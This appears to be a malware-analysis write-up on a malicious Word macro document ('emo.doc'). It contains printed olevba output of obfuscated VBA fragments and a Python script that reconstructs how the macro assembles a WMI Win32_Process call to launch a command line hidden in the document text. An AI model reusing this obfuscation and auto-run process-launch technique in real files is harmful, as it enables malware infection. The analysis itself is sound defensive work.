IwHWCHJLB = sqHqe
ojnIHCE(JoDasPDE + JoDasPDE) = (JdtFGmA + 5)
ojnIHCE(JoDasPDE + JoDasPDE) = 2 + Oct(7819) + Rwbej + CDbl(9) + (4 + YBDhHCIR + FMTZFCBH + Cos(2894))
Set Y5ruq1pwxek1348fi = CreateObject(Hy5393z_cu1)
   Dim XayLAAE(6 + 7 + 1 + 7) As String
Set hBkDI = (kuHYCInr)
Dim GUdOBwJFg(6 + 8 + 1 + 4) As String
XayLAAE(DFPEBfGJ) = (Sin(8) + 632 + 555)
MOOXq = yIMQNHJJ
XayLAAE(DFPEBfGJ + DFPEBfGJ) = (QRuDtDeBh + 8952)
XayLAAE(DFPEBfGJ + DFPEBfGJ) = 6 + Oct(4) + ydSHHJF + CDbl(464) + (6107 + jBTBKJJ + gFSXE + Cos(4815))
Dim cREZHj(6 + 7 + 1 + 5) As String
Set fCASJI = (sNHBGJB)
Dim ohlbI(5 + 5 + 1 + 7) As String
cREZHj(EPsmDJFHe) = (Sin(740) + 13 + 3027)
QZkhqLi = bYDhRDF
cREZHj(EPsmDJFHe + EPsmDJFHe) = (NgGemeSEB + 3)
cREZHj(EPsmDJFHe + EPsmDJFHe) = 2011 + Oct(8) + TddiLDt + CDbl(423) + (3 + DajuFERHE + WvQuFBA + Cos(23))
End Function
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
][(s)]wP][(s)]w
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
][(s)]wtar][(s)]w
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
][(s)]wtu][(s)]w
-------------------------------------------------------------------------------
VBA FORM Variable "b'Fwder3b7t4tqrecw'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'][(s)]wP][(s)]w'
-------------------------------------------------------------------------------
VBA FORM Variable "b'Mvskm12if9c843w3'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'][(s)]wtar][(s)]w'
-------------------------------------------------------------------------------
VBA FORM Variable "b'Cn8r2cg8i626ztt'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b'][(s)]wtu][(s)]w'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Create              |May execute file or a system command through |
|          |                    |WMI                                          |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|ChrW                |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

oleid showed that the document contains VBA macros with suspicious keywords, which is a strong sign that it is dangerous.

olevba dumped a huge, heavily obfuscated script, which means the macro is 110% malicious...
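To see what the obfuscation in the dump actually hides, here is an added Python example (not part of the write-up and not code from any tool it mentions) that reproduces the macro's own string handling offline: the Replace() in X4al3i4glox that strips the "][(s)]w" token, the assembly of the two strings X8twf_cydt6 passes to CreateObject from the literals and UserForm variables in the dump, and the AWLDFu7C7y thinning applied to the document body before it is handed to Create. It assumes that the variables never assigned anywhere in the dump (Sxybmdt069cn, Tvjy9j74xspx0wpf, Xta0s1qhuxcif8qqi5, Jxjv2dzc048yq4alc6, Jeo_8i41vkli6, A1h3yevqvs8, Hkhlqz9x9h9xvlv) are Empty under On Error Resume Next and therefore concatenate as empty strings, and that wdKeyS is Word's key-code constant 83. The write-up does not reproduce the document body, so the sample body below is constructed.

```python
"""Offline reproduction of the string handling seen in the emo.doc macro dump."""

JUNK = "][(s)]w"    # token spliced into every literal; X4al3i4glox strips it
WD_KEY_S = 83       # Word's wdKeyS constant, so ChrW(wdKeyS) == "S"

# String literals copied verbatim from the olevba output. The trailing variables
# they are concatenated with in the macro (Xta0s1qhuxcif8qqi5, Jxjv2dzc048yq4alc6,
# Jeo_8i41vkli6) are never assigned in the dump, so they contribute nothing.
E6qgao74pfq = "][(s" + ")]wro][(s)]w][(s)]wce][(s)]w" + "s][(s)]ws][(s)]w"
Op93rci3r56v3hsg = ("][(s)]w][(s" + ")]w:][(s)]ww][(s)]win][(s)]w][(s)"
                    + "]w3][(s)]w2][(s)]w_][(s)]w")
K8dgvsqr6fhbct6v = ("][(s)]w][(s)]ww" + "][(s)]wi][(s)]wnm][(s)]w][(s)]"
                    + "wgm][(s)]wt][(s)]w][(s)]w")
# UserForm variables (the "VBA FORM Variable" entries in the dump)
Fwder3b7t4tqrecw = "][(s)]wP][(s)]w"
Mvskm12if9c843w3 = "][(s)]wtar][(s)]w"
Cn8r2cg8i626ztt = "][(s)]wtu][(s)]w"


def strip_junk(s: str) -> str:
    """X4al3i4glox / I51m0kjl96lpdcfhm: Replace(s, "][(s)]w", Sxybmdt069cn).
    The replacement variable is never assigned, so VBA substitutes ""."""
    return s.replace(JUNK, "")


def build_wmi_strings() -> tuple:
    """Rebuild the two strings X8twf_cydt6 hands to CreateObject."""
    jv2 = chr(WD_KEY_S)                                   # Jv2btd64ezie8rdyer
    sd0 = K8dgvsqr6fhbct6v + jv2 + Op93rci3r56v3hsg + Fwder3b7t4tqrecw + E6qgao74pfq
    amst = strip_junk(sd0)                                # Amst4ijfvo1r0b5ium
    # Gav481k8nh28 (Tvjy9j74xspx0wpf is unassigned, hence omitted) plus the
    # extra Fwder3b7t4tqrecw appended in the call to Iwfbtu1s0d782jz.
    gav = amst + jv2 + Mvskm12if9c843w3 + Cn8r2cg8i626ztt + Fwder3b7t4tqrecw
    return amst, strip_junk(gav)


def awldfu7c7y(s: str) -> str:
    """AWLDFu7C7y: Mid(s, 1, 50), then Mid(s, i, 1) for i = 51, 53, ... (1-based),
    i.e. the first 50 characters followed by every second character after them."""
    return s[:50] + s[50::2]


def recover_command_line(document_text: str) -> str:
    """Mirror the pipeline applied to StoryRanges.Item(1): Mid(sss, 5, Len(sss))
    drops the first four characters, the junk token is stripped, and AWLDFu7C7y
    thins everything past the 50th character. The result is the first argument
    of the Win32_Process Create call."""
    return awldfu7c7y(strip_junk(document_text[4:]))


# Constructed sample body (NOT the real document text): four leading characters
# that Mid(sss, 5, ...) drops, two junk tokens, a 50-character head, then a tail
# in which each real character is followed by a filler that AWLDFu7C7y discards.
SAMPLE_HEAD = "demo-head-" * 5
SAMPLE_BODY = "XXXX" + JUNK + SAMPLE_HEAD[:25] + JUNK + SAMPLE_HEAD[25:] + "t#a#i#l#"


if __name__ == "__main__":
    moniker, startup = build_wmi_strings()
    print("CreateObject #1:", moniker)     # winmgmtS:win32_Process
    print("CreateObject #2:", startup)     # winmgmtS:win32_ProcessStartuP
    print("Command line from sample body:", recover_command_line(SAMPLE_BODY))
```

Run stand-alone, it shows that the junk-laced literals assemble into the WMI moniker for Win32_Process and a Win32_ProcessStartup object (whose XSize and YSize the macro zeroes) and that the command line passed to Create is the document's own text, minus its first four characters and the junk token, with every second character after position 50 dropped. That is the WMI process creation olevba flagged under Create. For the real sample, passing the text of the first story range to recover_command_line yields the command line without executing anything.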

Extract the VBA scripts as one file:

Manual analysis was too complicated, so I then found ViperMonkey while watching Malware Analysis - Malicious VBA.

The given Base64 blobs didn't evaluate to anything...

Another approach would be to perform dynamic analysis with a debugger, or to submit the document to https://app.any.run

https://app.any.run/tasks/564c32f0-1823-4a3c-bc85-0a6225ff789e


CyberChef > Base64 > Decode Text: UTF-16LE

The XOR seems to depend on the URL, but using the URLs yielded no readable text. What if the bytes themselves are encoded with XOR?
